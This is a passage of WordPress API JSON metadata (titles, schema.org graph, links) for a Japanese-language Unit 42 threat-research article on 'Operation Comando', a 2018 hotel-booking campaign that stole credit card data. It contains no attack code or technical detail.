42","twitter_card":"summary_large_image","twitter_title":"Comando\u4f5c\u6226: \u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u7a83\u53d6\u30d3\u30b8\u30cd\u30b9\u3092\u683c\u5b89\u3067\u52b9\u679c\u7684\u306b\u904b\u55b6\u3059\u308b\u65b9\u6cd5","twitter_description":"2018\u5e7412\u6708\u3001CapturaTela\u3068\u540d\u4ed8\u3051\u3089\u308c\u305f\u3001\u30db\u30c6\u30eb\u306e\u4e88\u7d04\u306b\u91cd\u70b9\u3092\u7f6e\u3044\u305f\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\uff61\u30db\u30c6\u30eb\u4e88\u7d04\u30b7\u30b9\u30c6\u30e0\u304c\u57f7\u62d7\u306b\u72d9\u308f\u308c\u308b\u7406\u7531\u306f\u3001\u9867\u5ba2\u306e\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u60c5\u5831\u7a83\u53d6\u306b\u3002\u653b\u6483\u8005\u304c\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u60c5\u5831\u7a83\u53d6\u3092\u30d3\u30b8\u30cd\u30b9\u3068\u3057\u3066\u904b\u55b6\u3059\u308b\u69d8\u5b50\u304c\u6d6e\u304b\u3073\u4e0a\u304c\u3063\u3066\u304d\u307e\u3057\u305f\u3002","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/"},"author":{"name":"Unit 42","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"headline":"Comando\u4f5c\u6226: \u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u7a83\u53d6\u30d3\u30b8\u30cd\u30b9\u3092\u683c\u5b89\u3067\u52b9\u679c\u7684\u306b\u904b\u55b6\u3059\u308b\u65b9\u6cd5","datePublished":"2019-03-12T19:00:14+00:00","dateModified":"2019-11-26T05:55:30+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/"},"wordCount":1851,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173.png","keywords":["CapturaTela","Operation Comando"],"articleSection":["Cybercrime","\u30b5\u30a4\u30d0\u30fc\u72af\u7f6a","\u30de\u30eb\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/","name":"Comando\u4f5c\u6226: \u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u7a83\u53d6\u30d3\u30b8\u30cd\u30b9\u3092\u683c\u5b89\u3067\u52b9\u679c\u7684\u306b\u904b\u55b6\u3059\u308b\u65b9\u6cd5","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173.png","datePublished":"2019-03-12T19:00:14+00:00","dateModified":"2019-11-26T05:55:30+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"description":"2018\u5e7412\u6708\u3001CapturaTela\u3068\u540d\u4ed8\u3051\u3089\u308c\u305f\u3001\u30db\u30c6\u30eb\u306e\u4e88\u7d04\u306b\u91cd\u70b9\u3092\u7f6e\u3044\u305f\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\uff61\u30db\u30c6\u30eb\u4e88\u7d04\u30b7\u30b9\u30c6\u30e0\u304c\u57f7\u62d7\u306b\u72d9\u308f\u308c\u308b\u7406\u7531\u306f\u3001\u9867\u5ba2\u306e\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u60c5\u5831\u7a83\u53d6\u306b\u3002\u653b\u6483\u8005\u304c\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u60c5\u5831\u7a83\u53d6\u3092\u30d3\u30b8\u30cd\u30b9\u3068\u3057\u3066\u904b\u55b6\u3059\u308b\u69d8\u5b50\u304c\u6d6e\u304b\u3073\u4e0a\u304c\u3063\u3066\u304d\u307e\u3057\u305f\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/#primaryimage","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173.png","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173.png","width":1253,"height":432},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"Comando\u4f5c\u6226: \u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u7a83\u53d6\u30d3\u30b8\u30cd\u30b9\u3092\u683c\u5b89\u3067\u52b9\u679c\u7684\u306b\u904b\u55b6\u3059\u308b\u65b9\u6cd5"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63","name":"Unit 42","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/4ffb3c2d260a0150fb91b3715442f8b3","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Unit 42"},"url":"https:\/\/unit42.paloaltonetworks.com\/ja\/author\/unit42\/"}]}},"_links":{"self":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/101359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/23"}],"replies":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=101359"}],"version-history":[{"count":4,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/101359\/revisions"}],"predecessor-version":[{"id":101388,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/101359\/revisions\/101388"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/101362"}],"wp:attachment":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=101359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=101359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=101359"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=101359"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=101359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}